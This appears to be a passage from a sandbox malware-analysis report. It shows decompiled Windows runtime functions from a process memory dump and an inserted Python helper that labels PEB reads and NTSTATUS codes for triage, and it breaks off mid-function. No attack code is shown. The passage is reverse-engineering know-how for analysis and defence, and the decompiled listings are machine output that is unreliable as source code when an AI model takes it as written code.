                                                      						_t101 = _t118 - 0x3c;
                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                      						goto L21;
                                                      					}
                                                      					_t67 = 0xc0000017;
                                                      					goto L28;
                                                      				}
                                                      				_push(0);
                                                      				_push(0x20);
                                                      				_push(_t118 - 0x60);
                                                      				_push(0x5a);
                                                      				_t94 = E01159860();
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                      				if(_t94 < 0) {
                                                      					goto L29;
                                                      				}
                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                      					_t101 = L"Legacy";
                                                      					_push(6);
                                                      				} else {
                                                      					_t101 = L"UEFI";
                                                      					_push(4);
                                                      				}
                                                      				_pop(_t65);
                                                      				goto L21;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: b2968fa39208793c63adaf92b711e99415ecf2b3e1a1178f8132d34c9d95847d
                                                      • Instruction ID: 6ac1d5cc130fb72fdc0ca069b1f85d18e4a748ff717fb992e8d6a4366ded8b2c
                                                      • Opcode Fuzzy Hash: b2968fa39208793c63adaf92b711e99415ecf2b3e1a1178f8132d34c9d95847d
                                                      • Instruction Fuzzy Hash: B9518D71E04609DFDF69CFA8C940AADBBB9BF48704F14406EE669EB241D7719A00CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E0113B944(signed int* __ecx, char __edx) {
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				char _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				intOrPtr _v44;
                                                      				signed int* _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				intOrPtr _v68;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v76;
                                                      				char _v77;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t65;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t68;
                                                      				char* _t73;
                                                      				intOrPtr _t77;
                                                      				intOrPtr _t78;
                                                      				signed int _t82;
                                                      				intOrPtr _t83;
                                                      				void* _t87;
                                                      				char _t88;
                                                      				intOrPtr* _t89;
                                                      				intOrPtr _t91;
                                                      				void* _t97;
                                                      				intOrPtr _t100;
                                                      				void* _t102;
                                                      				void* _t107;
                                                      				signed int _t108;
                                                      				intOrPtr* _t112;
                                                      				void* _t113;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t116;
                                                      				intOrPtr _t117;
                                                      				signed int _t118;
                                                      				void* _t130;
                                                      
                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                      				_v8 =  *0x120d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                      				_t112 = __ecx;
                                                      				_v77 = __edx;
                                                      				_v48 = __ecx;
                                                      				_v28 = 0;
                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                      				_t105 =  *_t5;
                                                      				_v20 = 0;
                                                      				_v16 = 0;
                                                      				if(_t105 == 0) {
                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                      					_t60 =  *__ecx |  *_t50;
                                                      					if(( *__ecx |  *_t50) != 0) {
                                                      						 *__ecx = 0;
                                                      						__ecx[1] = 0;
                                                      						if(E01137D50() != 0) {
                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      						} else {
                                                      							_t65 = 0x7ffe0386;
                                                      						}
                                                      						if( *_t65 != 0) {
                                                      							E011E8CD6(_t112);
                                                      						}
                                                      						_push(0);
                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                      						_push( *_t52);
                                                      						_t60 = E01159E20();
                                                      					}
                                                      					L20:
                                                      					_pop(_t107);
                                                      					_pop(_t113);
                                                      					_pop(_t87);
                                                      					return E0115B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                      				}
                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                      				_t67 =  *_t8;
                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                      				_t108 =  *(_t67 + 0x14);
                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                      				_t105 = 0x2710;
                                                      				asm("sbb eax, edi");
                                                      				_v44 = _t88;
                                                      				_v52 = _t108;
                                                      				_t60 = E0115CE00(_t97, _t68, 0x2710, 0);
                                                      				_v56 = _t60;
                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                      					L3:
                                                      					 *(_t112 + 0x44) = _t60;
                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                      					 *_t112 = _t88;
                                                      					 *(_t112 + 4) = _t108;
                                                      					_v20 = _t60 * 0x2710;
                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                      					if(_v77 != 0) {
                                                      						L16:
                                                      						_v36 = _t88;
                                                      						_v32 = _t108;
                                                      						if(E01137D50() != 0) {
                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      						} else {
                                                      							_t73 = 0x7ffe0386;
                                                      						}
                                                      						if( *_t73 != 0) {
                                                      							_t105 = _v40;
                                                      							E011E8F6A(_t112, _v40, _t88, _t108);
                                                      						}
                                                      						_push( &_v28);
                                                      						_push(0);
                                                      						_push( &_v36);
                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                      						_push( *_t48);
                                                      						_t60 = E0115AF60();
                                                      						goto L20;
                                                      					} else {
                                                      						_t89 = 0x7ffe03b0;
                                                      						do {
                                                      							_t114 = 0x7ffe0010;
                                                      							do {
                                                      								_t77 =  *0x1208628; // 0x0
                                                      								_v68 = _t77;
                                                      								_t78 =  *0x120862c; // 0x0
                                                      								_v64 = _t78;
                                                      								_v72 =  *_t89;
                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                      								while(1) {
                                                      									_t105 =  *0x7ffe000c;
                                                      									_t100 =  *0x7ffe0008;
                                                      									if(_t105 ==  *_t114) {
                                                      										goto L8;
                                                      									}
                                                      									asm("pause");
                                                      								}
                                                      								L8:
                                                      								_t89 = 0x7ffe03b0;
                                                      								_t115 =  *0x7ffe03b0;
                                                      								_t82 =  *0x7FFE03B4;
                                                      								_v60 = _t115;
                                                      								_t114 = 0x7ffe0010;
                                                      								_v56 = _t82;
                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                      							_t83 =  *0x1208628; // 0x0
                                                      							_t116 =  *0x120862c; // 0x0
                                                      							_v76 = _t116;
                                                      							_t117 = _v68;
                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                      						asm("sbb edx, [esp+0x24]");
                                                      						_t102 = _t100 - _v60 - _t117;
                                                      						_t112 = _v48;
                                                      						_t91 = _v44;
                                                      						asm("sbb edx, eax");
                                                      						_t130 = _t105 - _v52;
                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                      							_t88 = _t102 - _t91;
                                                      							asm("sbb edx, edi");
                                                      							_t108 = _t105;
                                                      						} else {
                                                      							_t88 = 0;
                                                      							_t108 = 0;
                                                      						}
                                                      						goto L16;
                                                      					}
                                                      				} else {
                                                      					if( *(_t112 + 0x44) == _t60) {
                                                      						goto L20;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      			}

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113B9A5
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: 4f48ef1e352b476ae2db14a2334042144d8e1a04eac461ae38bc1396575444fb
                                                      • Instruction ID: 4ae7e15b3c93c6444dd8ea93f8125f4b652eb96257e703b76c8bcc7e96bc6202
                                                      • Opcode Fuzzy Hash: 4f48ef1e352b476ae2db14a2334042144d8e1a04eac461ae38bc1396575444fb
                                                      • Instruction Fuzzy Hash: 185169B1A08701CFC729DF28C48092BBBE5FBC8614F15896EE99587349E730E844CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E0111B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                      				signed int _t65;
                                                      				signed short _t69;
                                                      				intOrPtr _t70;
                                                      				signed short _t85;
                                                      				void* _t86;
                                                      				signed short _t89;
                                                      				signed short _t91;
                                                      				intOrPtr _t92;
                                                      				intOrPtr _t97;
                                                      				intOrPtr* _t98;
                                                      				signed short _t99;
                                                      				signed short _t101;
                                                      				void* _t102;
                                                      				char* _t103;
                                                      				signed short _t104;
                                                      				intOrPtr* _t110;
                                                      				void* _t111;
                                                      				void* _t114;
                                                      				intOrPtr* _t115;
                                                      
                                                      				_t109 = __esi;
                                                      				_t108 = __edi;
                                                      				_t106 = __edx;
                                                      				_t95 = __ebx;
                                                      				_push(0x90);
                                                      				_push(0x11ef7a8);
                                                      				E0116D0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                      				if(__edx == 0xffffffff) {
                                                      					L6:
                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                      					__eflags = _t65 & 0x00000002;
                                                      					if((_t65 & 0x00000002) != 0) {
                                                      						L3:
                                                      						L4:
                                                      						return E0116D130(_t95, _t108, _t109);
                                                      					}
                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                      					_t108 = 0;
                                                      					_t109 = 0;
                                                      					_t95 = 0;
                                                      					__eflags = 0;
                                                      					while(1) {
                                                      						__eflags = _t95 - 0x200;
                                                      						if(_t95 >= 0x200) {
                                                      							break;
                                                      						}
                                                      						E0115D000(0x80);
                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                      						_t108 = _t115;
                                                      						_t95 = _t95 - 0xffffff80;
                                                      						_t17 = _t114 - 4;
                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                      						__eflags =  *_t17;
                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                      						_t102 = _t110 + 1;
                                                      						do {
                                                      							_t85 =  *_t110;
                                                      							_t110 = _t110 + 1;
                                                      							__eflags = _t85;
                                                      						} while (_t85 != 0);
                                                      						_t111 = _t110 - _t102;
                                                      						_t21 = _t95 - 1; // -129
                                                      						_t86 = _t21;
                                                      						__eflags = _t111 - _t86;
                                                      						if(_t111 > _t86) {
                                                      							_t111 = _t86;
                                                      						}
                                                      						E0115F3E0(_t108, _t106, _t111);
                                                      						_t115 = _t115 + 0xc;
                                                      						_t103 = _t111 + _t108;
                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                      						_t89 = _t95 - _t111;
                                                      						__eflags = _t89;
                                                      						_push(0);
                                                      						if(_t89 == 0) {
                                                      							L15:
                                                      							_t109 = 0xc000000d;
                                                      							goto L16;
                                                      						} else {
                                                      							__eflags = _t89 - 0x7fffffff;
                                                      							if(_t89 <= 0x7fffffff) {
                                                      								L16:
                                                      								 *(_t114 - 0x94) = _t109;
                                                      								__eflags = _t109;
                                                      								if(_t109 < 0) {
                                                      									__eflags = _t89;
                                                      									if(_t89 != 0) {
                                                      										 *_t103 = 0;
                                                      									}
                                                      									L26:
                                                      									 *(_t114 - 0xa0) = _t109;
                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                      									__eflags = _t109;
                                                      									if(_t109 >= 0) {
                                                      										L31:
                                                      										_t98 = _t108;
                                                      										_t39 = _t98 + 1; // 0x1
                                                      										_t106 = _t39;
                                                      										do {
                                                      											_t69 =  *_t98;
                                                      											_t98 = _t98 + 1;
                                                      											__eflags = _t69;
                                                      										} while (_t69 != 0);
                                                      										_t99 = _t98 - _t106;
                                                      										__eflags = _t99;
                                                      										L34:
                                                      										_t70 =  *[fs:0x30];
                                                      										__eflags =  *((char*)(_t70 + 2));
                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                      											L40:
                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                      											 *(_t114 - 4) = 1;
                                                      											_push(_t114 - 0x74);
                                                      											L0116DEF0(_t99, _t106);
                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                      											goto L3;
                                                      										}
                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                      											goto L40;
                                                      										}
                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                      										_push(_t99 & 0x0000ffff);
                                                      										_push(_t108);
                                                      										_push(1);
                                                      										_t101 = E0115B280();
                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                      											__eflags = _t101 - 0x80000003;
                                                      											if(_t101 == 0x80000003) {
                                                      												E0115B7E0(1);
                                                      												_t101 = 0;
                                                      												__eflags = 0;
                                                      											}
                                                      										}
                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                      										goto L4;
                                                      									}
                                                      									__eflags = _t109 - 0x80000005;
                                                      									if(_t109 == 0x80000005) {
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								 *(_t114 - 0x90) = 0;
                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                      								_t91 = E0115E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                      								_t115 = _t115 + 0x10;
                                                      								_t104 = _t91;
                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                      								__eflags = _t104;
                                                      								if(_t104 < 0) {
                                                      									L21:
                                                      									_t109 = 0x80000005;
                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                      									L22:
                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                      									L23:
                                                      									 *(_t114 - 0x94) = _t109;
                                                      									goto L26;
                                                      								}
                                                      								__eflags = _t104 - _t92;
                                                      								if(__eflags > 0) {
                                                      									goto L21;
                                                      								}
                                                      								if(__eflags == 0) {
                                                      									goto L22;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      							goto L15;
                                                      						}
                                                      					}
                                                      					__eflags = _t109;
                                                      					if(_t109 >= 0) {
                                                      						goto L31;
                                                      					}
                                                      					__eflags = _t109 - 0x80000005;
                                                      					if(_t109 != 0x80000005) {
                                                      						goto L31;
                                                      					}
                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                      					_t38 = _t95 - 1; // -129
                                                      					_t99 = _t38;
                                                      					goto L34;
                                                      				}
                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                      					__eflags = __edx - 0x65;
                                                      					if(__edx != 0x65) {
                                                      						goto L2;
                                                      					}
                                                      					goto L6;
                                                      				}
                                                      				L2:
                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                      				_push(_t106);
                                                      				if(E0115A890() != 0) {
                                                      					goto L6;
                                                      				}
                                                      				goto L3;
                                                      			}
                                                      (Instruction-address gutter for the listing above, covering 0x0111b171 to 0x0111b1de and 0x011747f9 to 0x01174a02; the per-line alignment between these addresses and the C code was not preserved in extraction.)

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 4863eaea83a086dc936a5052b579ba11468a2f006c87b1fdfee865e2b12a1538
                                                      • Instruction ID: fa9f333fb6cafa75c71540c3cdfde584928c5e25c85a7e18ee534339f4ea7fee
                                                      • Opcode Fuzzy Hash: 4863eaea83a086dc936a5052b579ba11468a2f006c87b1fdfee865e2b12a1538
                                                      • Instruction Fuzzy Hash: 3B51E171D0425ACFEF39CFA8C844BAEBBB0AF04714F2141A9D859AB782D7714941CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

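                                                      Both listings on this page are raw decompiler output, and the details worth triaging are easy to lose among the temporaries: the read of `*[fs:0x30] + 2` (the BeingDebugged byte of the 32-bit PEB) in the function above, the read of `*[fs:0x30] + 0x18` (PEB.ProcessHeap) in the function below, and the NTSTATUS constants 0x80000005, 0xc0000106 and 0xc0000017. The following Python helper is an added example, not part of the Joe Sandbox report, that annotates such lines by PEB offset and status constant. The PEB field offsets and status codes are public 32-bit Windows definitions; the regular expression for the decompiler's `*[fs:0x30]` spelling is an assumption based on the lines shown on this page, and the sample listing is constructed from those lines.

```python
import re

# Public 32-bit PEB field offsets (stable across Windows XP through 10).
PEB32_FIELDS = {
    0x02: "BeingDebugged",
    0x08: "ImageBaseAddress",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",
}

# NTSTATUS values that appear in (or commonly next to) the listings above.
NTSTATUS_NAMES = {
    0x80000005: "STATUS_BUFFER_OVERFLOW",
    0xC0000005: "STATUS_ACCESS_VIOLATION",
    0xC0000017: "STATUS_NO_MEMORY",
    0xC0000106: "STATUS_NAME_TOO_LONG",
}

# Assumption: the decompiler renders the TEB->Peb read as `*[fs:0x30]`,
# optionally followed by `+ <offset>` selecting a PEB field.
PEB_ACCESS = re.compile(r"\*\[fs:0x30\]\s*(?:\+\s*(0x[0-9a-fA-F]+|\d+))?")
# Eight-digit hex literals are the shape NTSTATUS codes take in the output.
HEX_CONST = re.compile(r"\b0x[0-9a-fA-F]{8}\b")


def _parse_int(text):
    """Accept the decompiler's hex (0x18) or decimal (2) offset spellings."""
    return int(text, 16) if text.lower().startswith("0x") else int(text, 10)


def peb_accesses(line):
    """Return (offset, field_name) for each PEB dereference on the line.

    offset is None when the bare PEB pointer is used without a field offset.
    """
    out = []
    for m in PEB_ACCESS.finditer(line):
        if m.group(1) is None:
            out.append((None, "PEB base pointer"))
            continue
        off = _parse_int(m.group(1))
        out.append((off, PEB32_FIELDS.get(off, "unknown PEB field")))
    return out


def ntstatus_constants(line):
    """Return (value, name) for every known NTSTATUS literal on the line."""
    out = []
    for m in HEX_CONST.finditer(line):
        value = int(m.group(0), 16)
        if value in NTSTATUS_NAMES:
            out.append((value, NTSTATUS_NAMES[value]))
    return out


def annotate(listing):
    """Walk a decompiled listing and return (line_no, note) pairs."""
    notes = []
    for line_no, line in enumerate(listing.splitlines(), 1):
        for off, name in peb_accesses(line):
            label = "PEB" if off is None else f"PEB+0x{off:02x}"
            notes.append((line_no, f"{label} -> {name}"))
        for value, name in ntstatus_constants(line):
            notes.append((line_no, f"0x{value:08x} -> {name}"))
    return notes


# Constructed sample: lines copied from the two listings on this page.
SAMPLE_LISTING = """\
if( *((char*)( *[fs:0x30] + 2)) != 0) {
_t109 = 0x80000005;
_t329 = 0xc0000106;
_t328 = L01134620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
_t329 = 0xc0000017;
"""

if __name__ == "__main__":
    for line_no, note in annotate(SAMPLE_LISTING):
        print(f"line {line_no}: {note}")
```

A hit on PEB+0x02 is what a sandbox reports as "checks if the current process is being debugged", but the flag is also read by ordinary runtime and library code, so the annotation tells you where to look, not what the author intended; the surrounding control flow decides that.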
                                                      C-Code - Quality: 81%
                                                      			E01142581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912016) {
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				unsigned int _v24;
                                                      				void* _v28;
                                                      				signed int _v32;
                                                      				unsigned int _v36;
                                                      				signed int _v37;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _t240;
                                                      				signed int _t244;
                                                      				signed int _t246;
                                                      				signed int _t247;
                                                      				signed int _t250;
                                                      				signed int _t252;
                                                      				intOrPtr _t254;
                                                      				signed int _t257;
                                                      				signed int _t264;
                                                      				signed int _t267;
                                                      				signed int _t275;
                                                      				intOrPtr _t281;
                                                      				signed int _t283;
                                                      				signed int _t285;
                                                      				void* _t286;
                                                      				signed int _t287;
                                                      				unsigned int _t290;
                                                      				signed int _t294;
                                                      				void* _t295;
                                                      				signed int _t296;
                                                      				signed int _t300;
                                                      				intOrPtr _t312;
                                                      				signed int _t321;
                                                      				signed int _t323;
                                                      				signed int _t324;
                                                      				signed int _t328;
                                                      				signed int _t329;
                                                      				signed int _t334;
                                                      				signed int _t336;
                                                      				signed int _t339;
                                                      				signed int _t340;
                                                      				void* _t342;
                                                      
                                                      				_t336 = _t339;
                                                      				_t340 = _t339 - 0x4c;
                                                      				_v8 =  *0x120d360 ^ _t336;
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t328 = 0x120b2e8;
                                                      				_v56 = _a4;
                                                      				_v48 = __edx;
                                                      				_v60 = __ecx;
                                                      				_t290 = 0;
                                                      				_v80 = 0;
                                                      				asm("movsd");
                                                      				_v64 = 0;
                                                      				_v76 = 0;
                                                      				_v72 = 0;
                                                      				asm("movsd");
                                                      				_v44 = 0;
                                                      				_v52 = 0;
                                                      				_v68 = 0;
                                                      				asm("movsd");
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				asm("movsd");
                                                      				_v16 = 0;
                                                      				_t281 = 0x48;
                                                      				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                      				_t321 = 0;
                                                      				_v37 = _t310;
                                                      				if(_v48 <= 0) {
                                                      					L16:
                                                      					_t45 = _t281 - 0x48; // 0x0
                                                      					__eflags = _t45 - 0xfffe;
                                                      					if(_t45 > 0xfffe) {
                                                      						_t329 = 0xc0000106;
                                                      						goto L32;
                                                      					} else {
                                                      						_t328 = L01134620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
                                                      						_v52 = _t328;
                                                      						__eflags = _t328;
                                                      						if(_t328 == 0) {
                                                      							_t329 = 0xc0000017;
                                                      							goto L32;
                                                      						} else {
                                                      							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                                      							_t50 = _t328 + 0x48; // 0x48
                                                      							_t323 = _t50;
                                                      							_t310 = _v32;
                                                      							 *((intOrPtr*)(_t328 + 0x3c)) = _t281;
                                                      							_t283 = 0;
                                                      							 *((short*)(_t328 + 0x30)) = _v48;
                                                      							__eflags = _t310;
                                                      							if(_t310 != 0) {
                                                      								 *(_t328 + 0x18) = _t323;
                                                      								__eflags = _t310 - 0x1208478;
                                                      								 *_t328 = ((0 | _t310 == 0x01208478) - 0x00000001 & 0xfffffffb) + 7;
                                                      								E0115F3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
                                                      								_t310 = _v32;
                                                      								_t340 = _t340 + 0xc;
                                                      								_t283 = 1;
                                                      								__eflags = _a8;
                                                      								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
                                                      								if(_a8 != 0) {
                                                      									_t275 = E011A39F2(_t323);
                                                      									_t310 = _v32;
                                                      									_t323 = _t275;
                                                      								}
                                                      							}
                                                      							_t294 = 0;
                                                      							_v16 = 0;
                                                      							__eflags = _v48;
                                                      							if(_v48 <= 0) {
                                                      								L31:
                                                      								_t329 = _v68;
                                                      								__eflags = 0;
                                                      								 *((short*)(_t323 - 2)) = 0;
                                                      								goto L32;
                                                      							} else {
                                                      								_t285 = _t328 + _t283 * 4;
                                                      								_v56 = _t285;
                                                      								do {
                                                      									__eflags = _t310;
                                                      									if(_t310 != 0) {
                                                      										_t240 =  *(_v60 + _t294 * 4);
                                                      										__eflags = _t240;
                                                      										if(_t240 == 0) {
                                                      											goto L30;
                                                      										} else {
                                                      											__eflags = _t240 == 5;
                                                      											if(_t240 == 5) {
                                                      												goto L30;
                                                      											} else {
                                                      												goto L22;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L22:
                                                      										 *_t285 =  *(_v60 + _t294 * 4);
                                                      										 *(_t285 + 0x18) = _t323;
                                                      										_t244 =  *(_v60 + _t294 * 4);
                                                      										__eflags = _t244 - 8;
                                                      										if(_t244 > 8) {
                                                      											goto L56;
                                                      										} else {
                                                      											switch( *((intOrPtr*)(_t244 * 4 +  &M01142959))) {
                                                      												case 0:
                                                      													__ax =  *0x1208488;
                                                      													__eflags = __ax;
                                                      													if(__ax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__ax & 0x0000ffff = E0115F3E0(__edi,  *0x120848c, __ax & 0x0000ffff);
                                                      														__eax =  *0x1208488 & 0x0000ffff;
                                                      														goto L26;
                                                      													}
                                                      													goto L108;
                                                      												case 1:
                                                      													L45:
                                                      													E0115F3E0(_t323, _v80, _v64);
                                                      													_t270 = _v64;
                                                      													goto L26;
                                                      												case 2:
                                                      													 *0x1208480 & 0x0000ffff = E0115F3E0(__edi,  *0x1208484,  *0x1208480 & 0x0000ffff);
                                                      													__eax =  *0x1208480 & 0x0000ffff;
                                                      													__eax = ( *0x1208480 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													goto L28;
                                                      												case 3:
                                                      													__eax = _v44;
                                                      													__eflags = __eax;
                                                      													if(__eax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__esi = __eax + __eax;
                                                      														__eax = E0115F3E0(__edi, _v72, __esi);
                                                      														__edi = __edi + __esi;
                                                      														__esi = _v52;
                                                      														goto L27;
                                                      													}
                                                      													goto L108;
                                                      												case 4:
                                                      													_push(0x2e);
                                                      													_pop(__eax);
                                                      													 *(__esi + 0x44) = __edi;
                                                      													 *__edi = __ax;
                                                      													__edi = __edi + 4;
                                                      													_push(0x3b);
                                                      													_pop(__eax);
                                                      													 *(__edi - 2) = __ax;
                                                      													goto L29;
                                                      												case 5:
                                                      													__eflags = _v36;
                                                      													if(_v36 == 0) {
                                                      														goto L45;
                                                      													} else {
                                                      														E0115F3E0(_t323, _v76, _v36);
                                                      														_t270 = _v36;
                                                      													}
                                                      													L26:
                                                      													_t340 = _t340 + 0xc;
                                                      													_t323 = _t323 + (_t270 >> 1) * 2 + 2;
                                                      													__eflags = _t323;
                                                      													L27:
                                                      													_push(0x3b);
                                                      													_pop(_t272);
                                                      													 *((short*)(_t323 - 2)) = _t272;
                                                      													goto L28;
                                                      												case 6:
                                                      													__ebx =  *0x120575c;
                                                      													__eflags = __ebx - 0x120575c;
                                                      													if(__ebx != 0x120575c) {
                                                      														_push(0x3b);
                                                      														_pop(__esi);
                                                      														do {
                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                      															E0115F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                      															__edi = __edi + __eax * 2;
                                                      															__edi = __edi + 2;
                                                      															 *(__edi - 2) = __si;
                                                      															__ebx =  *__ebx;
                                                      															__eflags = __ebx - 0x120575c;
                                                      														} while (__ebx != 0x120575c);
                                                      														__esi = _v52;
                                                      														__ecx = _v16;
                                                      														__edx = _v32;
                                                      													}
                                                      													__ebx = _v56;
                                                      													goto L29;
                                                      												case 7:
                                                      													 *0x1208478 & 0x0000ffff = E0115F3E0(__edi,  *0x120847c,  *0x1208478 & 0x0000ffff);
                                                      													__eax =  *0x1208478 & 0x0000ffff;
                                                      													__eax = ( *0x1208478 & 0x0000ffff) >> 1;
                                                      													__eflags = _a8;
                                                      													__edi = __edi + __eax * 2;
                                                      													if(_a8 != 0) {
                                                      														__ecx = __edi;
